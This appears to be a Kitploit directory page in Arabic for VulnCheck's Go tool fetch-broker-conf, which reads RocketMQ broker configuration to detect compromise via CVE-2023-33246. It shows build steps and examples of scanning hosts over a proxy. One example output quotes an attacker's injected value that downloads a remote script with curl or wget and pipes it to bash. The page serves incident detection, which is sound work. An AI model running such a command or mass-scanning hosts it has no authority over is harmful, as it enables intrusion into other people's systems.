Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
fetch-broker-conf — أداة استغلال مكتوبة بلغة Go لجلب إعدادات وسيط RocketMQ من أجل اكتشاف مؤشرات الاختراق لـ CVE-2023-33246 | Kitploit
أدوات/GitHubGitHub/vulncheck-oss/fetch-broker-conf
إدارة مؤشرات الاختراق (IOC)تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتاختبار الاختراقالاستجابة للحوادث
GitHubvulncheck-oss/fetch-broker-conf

fetch-broker-conf

أداة استغلال مكتوبة بلغة Go لجلب إعدادات وسيط RocketMQ من أجل اكتشاف مؤشرات الاختراق لـ CVE-2023-33246

عرض المستودع
51منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

تكوين وسيط Fetch Broker

سيحاول تكوين وسيط Fetch Broker تنزيل تكوين وسيط RocketMQ من أجل البحث عن مؤشرات الاختراق في المتغير rocketmqHome. يُستخدم هذا المتغير من قبل مهاجمين مختلفين لتنفيذ كود عبر CVE-2023-33246. للحصول على تفاصيل إضافية، راجع مدونة VulnCheck.

التجميع

يمكنك استخدام ملف makefile لبناء حاوية docker:

root@kitploit:~
make docker

أو، إذا كان لديك بيئة بناء Go جاهزة، فقط استخدم make:

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ make
gofmt -d -w main.go
golangci-lint run --fix main.go
GOOS=linux GOARCH=arm64 go build -o build/main_linux-arm64 main.go

الاستخدام

الأداة مبنية على go-exploit، لذا هناك طرق متعددة لتقديم الأهداف للمسح. يمكن العثور على وصف كامل في وثائق المسح للمشروع. ومع ذلك، يوضح ما يلي بعض الأمثلة:

مسح مضيف واحد

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhost 10.9.49.143 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:27:48.567836165-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}

مسح مضيفين متعددين

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts 10.9.49.143,10.9.49.150 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:34:27.505747211-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}
{
  "time": "2023-09-05T05:34:27.802345043-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.150",
  "port": 10911
}

مسح ملف من المضيفين باستخدام وكيل

go-exploit يوفر القدرة على المسح عبر ملف CSV مستهدف، حيث يكون CSV بالشكل: host, port, anything if ssl is enabled (على الرغم من تجاهل حقل SSL إذا تم استخدام -a). كما يوفر القدرة على المسح عبر وكيل. يعمل الأمر كالتالي (لاحظ أن -a هو اكتشاف SSL تلقائي):

root@kitploit:~
albinolobster@mournland:~/rocketmq-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts-file /tmp/rocketmq.csv -proxy socks5://127.0.0.1:9050 -log-json true 2>/dev/null | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-08-31T13:45:35.781849255-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "-c $@|sh . echo (curl -s x.x.x.x/rm.sh||wget -q -O- x.x.x.x/rm.sh)|bash;",
  "host": "x.x.x.x",
  "port": 10909
}
تنزيل الأداة